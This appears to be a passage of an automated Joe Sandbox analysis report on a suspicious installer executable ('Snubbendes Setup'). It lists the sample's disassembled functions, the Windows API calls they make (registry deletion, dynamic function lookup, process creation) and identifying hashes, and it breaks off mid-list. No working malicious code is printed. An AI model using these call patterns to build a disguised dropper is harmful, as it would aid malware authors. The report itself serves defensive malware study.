                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWidelstrlen
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsi19C1.tmp$C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\System.dll
                                                                                                                                                                                                          • API String ID: 3109718747-537908575
                                                                                                                                                                                                          • Opcode ID: 9638f0c716bd08f9217f8ac97dbdde4665538f929ad9b7691c1d64753cc7c8ee
                                                                                                                                                                                                          • Instruction ID: 0e395622636dcde05068836be4baa4a456a4d64089cc24394ac90f0f0b10d43f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9638f0c716bd08f9217f8ac97dbdde4665538f929ad9b7691c1d64753cc7c8ee
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A511E772A01204BADB10AFB18F4EA9E32659F54354F24403BF502F61C1DAFC9A41966E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1912718029-0
                                                                                                                                                                                                          • Opcode ID: 1537f09e12a9e60e0b2a8eae30c6507c5457e656f0290ab1b216bb77a8747b60
                                                                                                                                                                                                          • Instruction ID: a55e164afb4a2c5db24f06852be026e23ac61ce6859740a963365f2f7f7eec81
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1537f09e12a9e60e0b2a8eae30c6507c5457e656f0290ab1b216bb77a8747b60
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F116771904119FFEF11AF90DF8CEAE3B79FB54388B10003AF905E10A0D7B49E55AA28
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12055918566.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055888328.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055950186.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055980900.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1148316912-0
                                                                                                                                                                                                          • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                                                                                          • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                                                                                          • Opcode ID: 0fd3fa23c975e38c6d473a192a1cf371983019d3a64ccaac555819f547ea3512
                                                                                                                                                                                                          • Instruction ID: d5b0b812c52730b156692ce296a05b57ce8d9064807eae1c9fc7a35bbe74f0db
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0fd3fa23c975e38c6d473a192a1cf371983019d3a64ccaac555819f547ea3512
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7F0E172501504AFD701DBE4DE88CEEBBBDEB48311B10447AF541F51A1CA749D018B28
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00401D56 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDC.USER32(?), ref: 00401D59
                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                                                                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                                                                                                                          • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401DD1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3808545654-0
                                                                                                                                                                                                          • Opcode ID: 300463627e1e3070db780a64cda68b10aef53be99f4a2aa47825be2f225bc760
                                                                                                                                                                                                          • Instruction ID: 1901d7d296450183f5894fa9bbb5198f988e596920eebf68b9e2cfe033e75292
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 300463627e1e3070db780a64cda68b10aef53be99f4a2aa47825be2f225bc760
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A016271984640FFEB01ABB4AF8AB9A3F75AF65301F104579E541F61E2D97800059B2D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040496B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A0C
                                                                                                                                                                                                          • wsprintfW.USER32 ref: 00404A15
                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,0042D248), ref: 00404A28
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                          • String ID: %u.%u%s%s
                                                                                                                                                                                                          • API String ID: 3540041739-3551169577
                                                                                                                                                                                                          • Opcode ID: c39695ae270452159a58bdee07ca0e289f121739e597b4873a1b490847d35dae
                                                                                                                                                                                                          • Instruction ID: 0b736bf888c47b86caf201b097c22cff5488322ea99b5df57e3066faec5b3164
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c39695ae270452159a58bdee07ca0e289f121739e597b4873a1b490847d35dae
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9011E773A041283BDB10957D9C41EAF329CAB85334F254237FA25F31D1D978CD2182E9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                                                                                                          • String ID: !
                                                                                                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                                                                                                          • Opcode ID: d1ce46bd28cc36f50990ff65351f506775fb0047ee6065fba40e47d3ae025a49
                                                                                                                                                                                                          • Instruction ID: 7183083e97b306686418f33f328e020de39305092e82b8c4ae23370839422ec4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d1ce46bd28cc36f50990ff65351f506775fb0047ee6065fba40e47d3ae025a49
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48219071940209BEEF01AFB5CE4AABE7B75EB44744F10403EF601B61D1D6B89A40DB68
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00403B6F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetWindowTextW.USER32(00000000,Snubbendes Setup), ref: 00403C07
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: TextWindow
                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\SMGS-RCDU5010031.exe"$1033$Snubbendes Setup
                                                                                                                                                                                                          • API String ID: 530164218-2338366031
                                                                                                                                                                                                          • Opcode ID: 0db0831f5ec28912bcf09a08f50af73a8a69499f9d1cd40cf7ad1787c9be3605
                                                                                                                                                                                                          • Instruction ID: 847b53d7ec13df621055667e1e13bb36484023f01c55a5fe093bb98d5154ae24
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0db0831f5ec28912bcf09a08f50af73a8a69499f9d1cd40cf7ad1787c9be3605
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0611F035B046118BC3209F15DC40A737BBDEB8971A328417FE901AB3E1CB3DAD028B98
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00405A04 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405A0A
                                                                                                                                                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405A14
                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405A26
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A04
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                          • API String ID: 2659869361-3355392842
                                                                                                                                                                                                          • Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                                                                                                                                                                          • Instruction ID: e6cb25dffc9e5a2bb3a1dbad45cd46e4450efeecdd43702cab0598af126a0af2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06D05E31211534AAC211AB589D05CDB629C9E46304341442AF241B20A1C779595186FE
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004051AF: lstrlenW.KERNEL32(0042C228,00000000,0041C400,75BA23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                                                                                                                                            • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,0042C228,00000000,0041C400,75BA23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                                                                                                                                            • Part of subcall function 004051AF: lstrcatW.KERNEL32(0042C228,0040318B), ref: 0040520A
                                                                                                                                                                                                            • Part of subcall function 004051AF: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040521C
                                                                                                                                                                                                            • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                                                                                                                                            • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                                                                                                                                            • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                                                                                                                                            • Part of subcall function 00405730: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405759
                                                                                                                                                                                                            • Part of subcall function 00405730: CloseHandle.KERNEL32(?), ref: 00405766
                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
